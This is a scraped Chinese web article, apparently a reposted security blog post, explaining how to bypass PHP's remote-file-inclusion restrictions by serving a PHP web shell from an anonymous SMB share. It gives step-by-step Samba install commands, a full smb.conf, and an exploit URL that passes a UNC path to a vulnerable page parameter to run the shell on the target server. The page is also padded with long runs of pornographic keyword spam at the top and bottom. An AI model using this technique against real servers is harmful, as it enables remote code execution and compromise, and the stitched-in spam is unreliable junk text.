婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 使用SMB共享來繞過php遠程文件包含的限制執(zhí)行RFI的利用

使用SMB共享來繞過php遠程文件包含的限制執(zhí)行RFI的利用

熱門標簽:咸寧銷售電銷機器人系統(tǒng) 余姚電話機器人 電銷機器人問門薩維品牌my 400電話蘭州申請請 外呼系統(tǒng)能給企業(yè)帶來哪些好處 百度地圖怎樣標注圖標 百度地圖標注偏差 廣東廣州在怎么申請400電話 開發(fā)地圖標注類網(wǎng)站

在這篇博文中,我將為大家演示如何利用PHP應用中的遠程文件包含漏洞的技術。我們將繞過php遠程文件包含的限制,并執(zhí)行RFI的利用,即使PHP環(huán)境被配置為不包含來自遠程HTTP/FTP URL的文件。

PHP 和 SMB 共享文件訪問

在PHP配置文件中,“allow_url_include”wrapper默認設置為“Off”,指示PHP不加載遠程HTTP或FTP URL,從而防止遠程文件包含攻擊。但是,即使“allow_url_include”和“allow_url_fopen”都設置為“Off”,PHP也不會阻止加載SMB URL。而這就極有可能被濫用來從SMB共享加載遠程托管的PHP Web shell。

攻擊場景概述

當易受攻擊的PHP應用程序代碼嘗試從受攻擊者控制的SMB共享加載PHP Web shell時,SMB共享應允許訪問該文件。攻擊者需要在其上配置具有匿名瀏覽訪問權限的SMB服務器。因此,一旦易受攻擊的應用程序嘗試從SMB共享訪問PHP Web shell,SMB服務器將不會要求任何的憑據(jù),易受攻擊的應用程序將包含Web shell的PHP代碼。

首先,我重新配置了PHP環(huán)境,并在php.in i文件中禁用了“allow-url-fopen”和“allow-url-include”。之后,配置了具有匿名瀏覽訪問的SMB服務器。一旦SMB共享準備就緒,我們就可以利用易受攻擊的應用程序了。

PHP 環(huán)境設置

將托管易受攻擊代碼的機器上的“allow_url_fopen”和“allow_url_include”設置為“Off”

以下是版本為“5.5.11”的PHP當前配置截圖:

 

在繼續(xù)下一步之前,讓我們確保當我們嘗試訪問HTTP上托管的Web shell時,PHP代碼不允許遠程文件包含。

 

可以看到,當我試圖從遠程主機包含PHP Web shell時,應用程序拋出錯誤并且沒有包含遠程文件。

使用匿名瀏覽訪問配置 Samba 服務器(Linux 機器)
使用以下命令安裝Samba服務器:

apt-get install samba創(chuàng)建SMB共享目錄:

mkdir /var/www/html/pub/

 

配置新創(chuàng)建的SMB共享目錄的權限:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

 

運行以下命令,刪除SAMBA服務器配置文件的默認內容。

echo > /etc/samba/smb.conf將以下內容添加到/etc/samba/smb.conf文件。

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555

force user = nobody現(xiàn)在,重啟SAMBA服務器以使配置文件/etc/samba/smb.conf中的新配置生效。

service smbd restart成功重啟SAMBA服務器后,嘗試訪問SMB共享并確保SAMBA服務器不要求提供憑據(jù)。

在本例中,SAMBA服務器IP為192.168.0.3,我需要訪問Windows文件瀏覽器中的SMB共享,如下:

\\192.168.0.3\&;

 

在 SMB 共享中托管 PHP Web shell

太棒了!可以訪問smb共享,并顯示目錄“ica”存在。

 

現(xiàn)在,將PHP shell托管在目錄“/var/www/html/pub”中,該目錄為smb共享目錄“ica”。

成功托管PHP shell后,我們使用Windows文件瀏覽器訪問SMB共享目錄“ica”。

\\192.168.0.3\ica\可以看到php shell存在于smb共享目錄中,在本例中為box.php文件。

 

利用文件包含易受攻擊的參數(shù)
讓我們使用這個PHP shell SMB鏈接,以及易受攻擊的php代碼瀏覽它。

http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.phpPHP易受攻擊的代碼從SMB共享中獲取了web shell,并在應用程序服務器上執(zhí)行了代碼\m/。我們已經繞過了php遠程文件包含的限制,并包含了托管在遠程主機上的Web shell。

 

總結

以上所述是小編給大家介紹的使用SMB共享來繞過php遠程文件包含的限制執(zhí)行RFI的利用,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網(wǎng)站的支持!

您可能感興趣的文章:
  • php文件包含目錄配置open_basedir的使用與性能詳解
  • PHP中你應該知道的require()文件包含的正確用法
  • php 偽造本地文件包含漏洞的代碼
  • PHP 網(wǎng)絡開發(fā)詳解之遠程文件包含漏洞
  • php文件包含的幾種方式總結

標簽:衡陽 銅陵 十堰 巴彥淖爾 臨沂 重慶 鷹潭 麗江

巨人網(wǎng)絡通訊聲明:本文標題《使用SMB共享來繞過php遠程文件包含的限制執(zhí)行RFI的利用》,本文關鍵詞  使用,SMB,共享,來,繞過,php,;如發(fā)現(xiàn)本文內容存在版權問題,煩請?zhí)峁┫嚓P信息告之我們,我們將及時溝通與處理。本站內容系統(tǒng)采集于網(wǎng)絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《使用SMB共享來繞過php遠程文件包含的限制執(zhí)行RFI的利用》相關的同類信息!
  • 本頁收集關于使用SMB共享來繞過php遠程文件包含的限制執(zhí)行RFI的利用的相關信息資訊供網(wǎng)民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    欧美专区日韩专区| 亚洲色图清纯唯美| 国产日韩欧美精品电影三级在线| 国产欧美一区二区精品性色超碰| 最近日韩中文字幕| 午夜国产不卡在线观看视频| 加勒比av一区二区| 99re亚洲国产精品| 欧美一区二区福利在线| 国产精品欧美一区二区三区| 三级一区在线视频先锋| 精品一区免费av| 色综合久久天天综合网| 日韩三级av在线播放| 自拍偷拍亚洲综合| 麻豆精品视频在线观看| 99久久国产综合精品女不卡| 日韩精品一区二区三区老鸭窝 | 成人免费看片app下载| 一卡二卡三卡日韩欧美| 91丨porny丨首页| 欧美视频你懂的| 一区二区三区在线视频播放| 99久久免费精品| 亚洲欧美日韩国产一区二区三区| 高清免费成人av| 久久婷婷综合激情| 国产精品白丝jk白祙喷水网站| 欧美mv和日韩mv的网站| 免费观看成人av| 欧美大片国产精品| 国产制服丝袜一区| 久久久久久久久久久久久夜| 韩国v欧美v日本v亚洲v| 国产亚洲欧美色| av色综合久久天堂av综合| 国产精品女同互慰在线看| 9久草视频在线视频精品| 国产精品视频免费| 色综合久久久久综合体桃花网| 亚洲精品国产无天堂网2021| 91国偷自产一区二区开放时间 | 欧美伦理视频网站| 午夜精品福利久久久| 欧美电影精品一区二区| 国产综合久久久久久鬼色| 国产拍揄自揄精品视频麻豆| 97久久精品人人做人人爽 | 欧美电影在线免费观看| 人妖欧美一区二区| 国产日韩欧美高清在线| 99久久99久久免费精品蜜臀| 亚洲国产精品久久久男人的天堂| 91精品国产一区二区三区| 国产一区二区剧情av在线| 成人欧美一区二区三区视频网页| 在线看不卡av| 国内精品第一页| 一区二区三区中文字幕精品精品| 欧美嫩在线观看| 国产91精品一区二区麻豆网站| 一区二区在线看| 欧美成人一区二区三区片免费| 高清成人免费视频| 五月天婷婷综合| 国产精品婷婷午夜在线观看| 欧美高清视频不卡网| 国产麻豆精品视频| 一区二区三区欧美日| 欧美白人最猛性xxxxx69交| 99久久综合狠狠综合久久| 国产精品丝袜91| 久久精品国产秦先生| 精品欧美一区二区三区精品久久 | 亚洲国产精品二十页| 国产.欧美.日韩| 亚洲欧洲精品一区二区三区 | 日韩国产欧美在线视频| 三级在线观看一区二区| 欧美精品日韩一区| 日韩精品电影在线| 日韩欧美国产电影| 欧美日本一道本在线视频| 天堂成人免费av电影一区| 亚洲欧洲三级电影| 亚洲精品一区二区三区精华液| 欧美体内she精高潮| 白白色 亚洲乱淫| 狠狠久久亚洲欧美| 天天综合天天综合色| 亚洲乱码国产乱码精品精小说| 国产日韩欧美电影| 欧美日韩一级片网站| 一区二区免费在线| 91精品国产综合久久精品图片| 美女视频一区二区三区| 亚洲国产精品ⅴa在线观看| 91网址在线看| 日韩电影免费一区| 久久这里只有精品视频网| 成人aaaa免费全部观看| 亚洲国产精品一区二区久久 | 国产精品 日产精品 欧美精品| 欧美激情综合五月色丁香小说| 91丨porny丨在线| 日韩av中文字幕一区二区| 国产偷国产偷亚洲高清人白洁| 91久久精品一区二区三| 日本在线不卡视频| 国产精品色婷婷久久58| 欧美日韩三级视频| 国产精品99久久久久久久vr| 伊人色综合久久天天人手人婷| 日韩欧美成人激情| 97久久精品人人澡人人爽| 奇米影视一区二区三区| 国产精品毛片久久久久久久| 欧美肥妇毛茸茸| www.性欧美| 麻豆精品在线播放| 亚洲精品一二三区| 欧美精品一区二区三区在线播放| 91丨九色丨尤物| 久久99精品久久久久久| 一区二区三区电影在线播| 欧美精品一区在线观看| 欧美日韩国产一二三| 成人免费视频视频| 免费看日韩精品| 亚洲精品精品亚洲| 久久久久久麻豆| 欧美日韩大陆在线| 成人网男人的天堂| 日韩av网站在线观看| 亚洲欧美日韩久久精品| 久久久久久久久久电影| 欧美日本一道本| 91福利精品第一导航| 国产成人久久精品77777最新版本| 午夜视黄欧洲亚洲| 亚洲欧美乱综合| 日本一区二区不卡视频| 精品久久久久一区二区国产| 欧美日韩一级二级三级| 91色在线porny| 国产色爱av资源综合区| 欧美成人vps| 欧美日韩精品免费观看视频| 97久久精品人人爽人人爽蜜臀| 国产一区在线视频| 美女爽到高潮91| 日本在线不卡视频| 亚洲综合久久av| 亚洲日本va午夜在线影院| 欧美激情一区三区| 精品久久99ma| 欧美电视剧在线看免费| 日韩欧美色综合| 亚洲婷婷综合久久一本伊一区| 美腿丝袜亚洲一区| 色呦呦国产精品| 国产亚洲欧洲一区高清在线观看| 亚洲成av人片一区二区三区| 久久精品99久久久| 亚洲视频香蕉人妖| 亚洲视频免费在线观看| 中文字幕一区二区三区蜜月| 国产精品久久久99| 中文字幕日韩欧美一区二区三区| 国产女同性恋一区二区| 久久久久久久久伊人| 久久久噜噜噜久久人人看| 久久久精品免费观看| 久久久久久久性| 国产视频视频一区| 国产蜜臀97一区二区三区 | 91一区二区在线观看| 99视频精品在线| 色综合天天性综合| 色综合久久六月婷婷中文字幕| 色拍拍在线精品视频8848| 色呦呦国产精品| 欧美婷婷六月丁香综合色| 欧美日韩亚州综合| 欧美一区二区在线免费观看| 日韩一区二区三区av| 精品伦理精品一区| 国产亚洲女人久久久久毛片| 国产欧美日韩久久| 亚洲欧美在线观看| 亚洲一区在线免费观看| 日韩激情视频网站| 久久国产福利国产秒拍| 国产精品综合二区| av亚洲精华国产精华精华| 欧美在线观看一区| 91精品国产色综合久久不卡蜜臀| 欧美草草影院在线视频| 国产精品欧美一级免费| 亚洲一区二区三区自拍|